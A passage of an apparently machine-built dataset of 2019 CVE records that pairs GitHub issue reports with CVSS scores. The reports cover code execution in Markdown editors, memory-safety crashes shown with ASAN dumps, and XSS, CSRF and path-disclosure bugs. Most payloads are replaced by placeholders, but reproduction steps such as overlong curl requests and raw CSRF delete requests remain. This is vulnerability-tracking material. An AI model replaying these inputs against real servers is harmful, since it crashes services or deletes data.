        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2505",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-05-16T09:20:24Z",
        "description": "Code Execution in Typora. Summary A local file path traversal issue exists in Typora version NUMBERTAG for APITAG which allows an attacker to execute arbitrary programs. Technical observation A crafted URI can be used in a note to perform this attack using PATHTAG as an argument or by traversing to any directory like ( PATHTAG ) Video APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12138",
        "Issue_Url_old": "https://github.com/MacDownApp/macdown/issues/1076",
        "Issue_Url_new": "https://github.com/macdownapp/macdown/issues/1076",
        "Repo_new": "macdownapp/macdown",
        "Issue_Created_At": "2019-05-16T09:58:31Z",
        "description": "Code Execution in Macdown. Summary A local file path traversal issue exists in Macdown version NUMBERTAG for APITAG which allows an attacker to execute arbitrary programs. Technical observation A crafted URI can be used in a note to perform this attack using PATHTAG as an argument or by traversing to any directory like ( PATHTAG ) Video APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12158",
        "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/17",
        "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/17",
        "Repo_new": "fekberg/gohttp",
        "Issue_Created_At": "2019-05-17T06:16:24Z",
        "description": "Heap Buffer Overflow when appending certain size string to URL file extension when compiled with ASAN.. Screen S Server APITAG CTRL A, D Screen S Crash curl APITAG CTRL A, D ASAN Details NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG efbb at pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffd9e6f3a NUMBERTAG sp NUMBERTAG ffd9e6f3a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG efbb thread T NUMBERTAG e NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG f NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG efbb is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG a NUMBERTAG in malloc ( PATHTAG NUMBERTAG f2c in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG f NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12159",
        "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/16",
        "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/16",
        "Repo_new": "fekberg/gohttp",
        "Issue_Created_At": "2019-05-17T06:11:38Z",
        "description": "Stack Buffer Overflow when requesting excessively long URL when compiled with ASAN.. Screen S Server APITAG CTRL A, D Screen S Crash python c \"print 'A NUMBERTAG file curl APITAG file) CTRL A, D Screen R Server NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffcea NUMBERTAG b NUMBERTAG at pc NUMBERTAG fcfe NUMBERTAG b bp NUMBERTAG ffcea NUMBERTAG sp NUMBERTAG ffcea NUMBERTAG ff8 READ of size NUMBERTAG at NUMBERTAG ffcea NUMBERTAG b NUMBERTAG thread T NUMBERTAG fcfe NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c1 in scan ( PATHTAG NUMBERTAG c5 in APITAG ( PATHTAG NUMBERTAG in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG fcfe NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffcea NUMBERTAG b NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a0 in receive ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG buffer' APITAG NUMBERTAG d4a NUMBERTAG f3]f3 f3 f3 f3 f3 f3 f NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG d4a NUMBERTAG a NUMBERTAG d4a NUMBERTAG b NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12160",
        "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/15",
        "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/15",
        "Repo_new": "fekberg/gohttp",
        "Issue_Created_At": "2019-05-17T06:04:40Z",
        "description": "Heap Use After Free Notification when compiling with ASAN on Ubuntu NUMBERTAG GCC NUMBERTAG Steps to reproduce: Compile APITAG Server (GCC and ASAN flags/LIBS). Screen S server cd APITAG APITAG CTRL A, D APITAG from session) Screen S Request curl FILETAG CTRL A, D Screen R server Dump NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG dc0 at pc NUMBERTAG ff1c4d NUMBERTAG b bp NUMBERTAG f fe6d5acce0 sp NUMBERTAG ffe6d5ac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG dc0 thread T NUMBERTAG ff1c4d NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG d9c in APITAG ( PATHTAG NUMBERTAG bc in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG dc0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ff1c4d7e2ca in __interceptor_free ( PATHTAG NUMBERTAG d in APITAG ( PATHTAG NUMBERTAG f2 in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG ff1c4d7e NUMBERTAG in malloc ( PATHTAG NUMBERTAG f3a in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap use after free NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12172",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2166",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2166",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-02-07T20:05:43Z",
        "description": "Typora Version NUMBERTAG Remote Code Execution Vulnerability. Typora Version NUMBERTAG Remote Code Execution Vulnerability Description: Typora fails to sanitize input on HTML attributes. Abusing the APITAG URI scheme on HTML attributes can result in arbitrary code execution. The below proof of concepts will execute calculator when opened inside of Typora APITAG Linux, Windows). Attached are screenshots as well as the .md files that trigger the vulnerability APITAG Tested On: APITAG NUMBERTAG Ubuntu NUMBERTAG Windows NUMBERTAG Proof of Concepts: APITAG CODETAG Windows: CODETAG Linux: CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12173",
        "Issue_Url_old": "https://github.com/MacDownApp/macdown/issues/1050",
        "Issue_Url_new": "https://github.com/macdownapp/macdown/issues/1050",
        "Repo_new": "macdownapp/macdown",
        "Issue_Created_At": "2019-01-28T02:45:54Z",
        "description": "Macdown Version NUMBERTAG Remote Code Execution. Macdown Version NUMBERTAG Remote Code Execution Macdown version NUMBERTAG is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing the APITAG URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the APITAG Calculator.app when opened inside of Macdown. APITAG APITAG ERRORTAG Screenshot: APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12198",
        "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/18",
        "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/18",
        "Repo_new": "fekberg/gohttp",
        "Issue_Created_At": "2019-05-19T18:57:53Z",
        "description": "stack buffer overflow NUMBERTAG characters in User Agent string causes stack overflow.. APITAG APITAG APITAG root MENTIONTAG APITAG APITAG : APITAG PATHTAG APITAG APITAG curl A APITAG localhost NUMBERTAG APITAG APITAG APITAG APITAG root MENTIONTAG APITAG APITAG : APITAG PATHTAG APITAG APITAG APITAG Settings: Port NUMBERTAG Server root: PATHTAG Configuration file: APITAG Logfile: .log Deamon NUMBERTAG APITAG APITAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff NUMBERTAG bd NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fff NUMBERTAG bae0 sp NUMBERTAG fff NUMBERTAG b NUMBERTAG APITAG APITAG APITAG APITAG READ of size NUMBERTAG at NUMBERTAG fff NUMBERTAG bd NUMBERTAG thread T0 APITAG APITAG NUMBERTAG f3f ( PATHTAG NUMBERTAG b ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG cbc ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG fc NUMBERTAG ca NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG ) APITAG APITAG NUMBERTAG fff NUMBERTAG bd NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame APITAG APITAG NUMBERTAG f ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG apos;buffer&apos; (line NUMBERTAG APITAG APITAG &lt;== Memory access at offset NUMBERTAG overflows this variable APITAG APITAG HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions are supported) SUMMARY: APITAG stack buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG NUMBERTAG gt NUMBERTAG a NUMBERTAG APITAG APITAG f3 APITAG APITAG ] APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG NUMBERTAG b NUMBERTAG c NUMBERTAG d NUMBERTAG e NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: APITAG APITAG fa APITAG APITAG Freed heap region: APITAG APITAG fd APITAG APITAG Stack left redzone: APITAG APITAG f1 APITAG APITAG Stack mid redzone: APITAG APITAG f2 APITAG APITAG Stack right redzone: APITAG APITAG f3 APITAG APITAG Stack after return: APITAG APITAG f5 APITAG APITAG Stack use after scope: APITAG APITAG f8 APITAG APITAG Global redzone: APITAG APITAG f9 APITAG APITAG Global init order: APITAG APITAG f6 APITAG APITAG Poisoned by user: APITAG APITAG f7 APITAG APITAG Container overflow: APITAG APITAG fc APITAG APITAG Array cookie: APITAG APITAG ac APITAG APITAG Intra object redzone: APITAG APITAG bb APITAG APITAG APITAG internal: APITAG APITAG fe APITAG APITAG Left alloca redzone: APITAG APITAG ca APITAG APITAG Right alloca redzone: APITAG APITAG cb APITAG APITAG NUMBERTAG ABORTING APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12206",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/162",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/162",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-05-20T08:18:34Z",
        "description": "heap buffer overflow in nxt_utf8_encode APITAG NJS version ERRORTAG APITAG testcase: ERRORTAG APITAG testcase (b NUMBERTAG CODETAG Valgrind output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12207",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/168",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/168",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-05-20T09:01:01Z",
        "description": "heap buffer overflow in nxt_utf8_decode APITAG Testcase (in base NUMBERTAG CODETAG njs version: APITAG Stack trace (from ASAN): ERRORTAG Found by fluff URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12208",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/163",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/163",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2019-05-20T08:30:18Z",
        "description": "heap buffer overflow in njs_function_native_call APITAG NJS version ERRORTAG APITAG testcase: ERRORTAG ASAN log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12215",
        "Issue_Url_old": "https://github.com/matomo-org/matomo/issues/14464",
        "Issue_Url_new": "https://github.com/matomo-org/matomo/issues/14464",
        "Repo_new": "matomo-org/matomo",
        "Issue_Created_At": "2019-05-20T08:54:18Z",
        "description": "Full Path Disclosure. A full path disclosure vulnerability was discovered in Matomo APITAG where a user can trigger a particular error to discover the full path of Matomo on the disk. PAYLOAD URLTAG APITAG RESULT: Neither the property APITAG nor one of the methods APITAG APITAG or APITAG exist and have public access in class PATHTAG in PATHTAG line NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12250",
        "Issue_Url_old": "https://github.com/IdentityServer/IdentityServer4/issues/3279",
        "Issue_Url_new": "https://github.com/identityserver/identityserver4/issues/3279",
        "Repo_new": "identityserver/identityserver4",
        "Issue_Created_At": "2019-05-21T07:00:37Z",
        "description": "XSS in the APITAG Hi, FILETAG in the APITAG method the PARAM APITAG is not filtred, and can be injected with XSS payload APITAG in which can be triggred from the log as well. static APITAG APITAG APITAG { var request = APITAG var result = Log APITAG APITAG => APITAG h => APITAG APITAG true) APITAG APITAG APITAG APITAG if APITAG result = APITAG APITAG => APITAG v => APITAG return result; }",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12253",
        "Issue_Url_old": "https://github.com/ilosuna/mylittleforum/issues/468",
        "Issue_Url_new": "https://github.com/my-little-forum/mylittleforum/issues/468",
        "Repo_new": "my-little-forum/mylittleforum",
        "Issue_Created_At": "2019-05-06T07:10:31Z",
        "description": "CSRF token not present in delete posting request in admin panel | Manage posting. Application is vulnerable for CSRF as CSRF token is not sent when a delete posting request is triggered. There are two scenarios which I have observed in this request NUMBERTAG Delete request is a simple GET request : GET APITAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG DNT NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Delete request is a post request but without CSRF token. POST FILETAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG NUMBERTAG delete_posting_confirm=OK+ APITAG In both the cases application is vulnerable to CSRF, where attacker can trigger delete request when a victim clicks on a vulnerable link.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12291",
        "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5888",
        "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5888",
        "Repo_new": "hashicorp/consul",
        "Issue_Created_At": "2019-05-22T19:21:46Z",
        "description": "Reserve Issue Number.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12298",
        "Issue_Url_old": "https://github.com/JayXon/Leanify/issues/50",
        "Issue_Url_new": "https://github.com/jayxon/leanify/issues/50",
        "Repo_new": "jayxon/leanify",
        "Issue_Created_At": "2019-05-20T17:43:12Z",
        "description": "Fuzzing: Specially crafted input file results in repeatable crash when compiled with ASAN under Ubuntu/GCC.. I found Leanify while doing some research and decided to use Radamsa to test the robustness of the application. It appears pretty solid. I grabbed a ton of test files and then ran this simple loop to generate some more files; for i in $(ls); do cat $i | radamsa; done. I did note a few things that were interesting, the most of which was a crash noted by ASAN from mutated files that proved hard to debug. I've done the test case reduction already down from several hundred bytes to the smallest byte string I could find that still induced the crash. I did note that by modifying the length of the input file, the resulting address of the crash could be changed. Note that in the reproduction steps below, amongst the output shows the READ attempt at crash time. Another interesting crash I noted was a WRITE of NUMBERTAG bytes in another crash file. READ: root APITAG cat unknown_crash ?.W\\T NUMBERTAG APITAG ./leanify /root/test Processing: /root/test APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fec NUMBERTAG d at pc NUMBERTAG ffff6eda NUMBERTAG b bp NUMBERTAG fffffffdf NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff7fec NUMBERTAG d thread T NUMBERTAG ffff6eda NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). SUMMARY: APITAG unknown crash NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG a0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG b0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG c0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG d0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG e0: fe fe fe fe fe fe fe[fe]fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG f0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Another READ: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fecc4a at pc NUMBERTAG ffff6eda NUMBERTAG b bp NUMBERTAG fffffffdf NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff7fecc4a thread T NUMBERTAG ffff6eda NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). SUMMARY: APITAG unknown crash NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe[fe]fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG a0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG b0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG c0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG d0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING A WRITE crash: Checksum does not match! APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fea NUMBERTAG at pc NUMBERTAG ffff6ef6bec bp NUMBERTAG fffffffe NUMBERTAG sp NUMBERTAG fffffffd8d8 WRITE of size NUMBERTAG at NUMBERTAG ffff7fea NUMBERTAG thread T NUMBERTAG ffff6ef6beb in __asan_memset ( PATHTAG NUMBERTAG b3e ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). SUMMARY: APITAG unknown crash NUMBERTAG asan_memset Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG b NUMBERTAG eff NUMBERTAG c NUMBERTAG eff NUMBERTAG d NUMBERTAG eff NUMBERTAG e NUMBERTAG eff NUMBERTAG f NUMBERTAG eff NUMBERTAG fe]fe fe fe fe fe fe fe 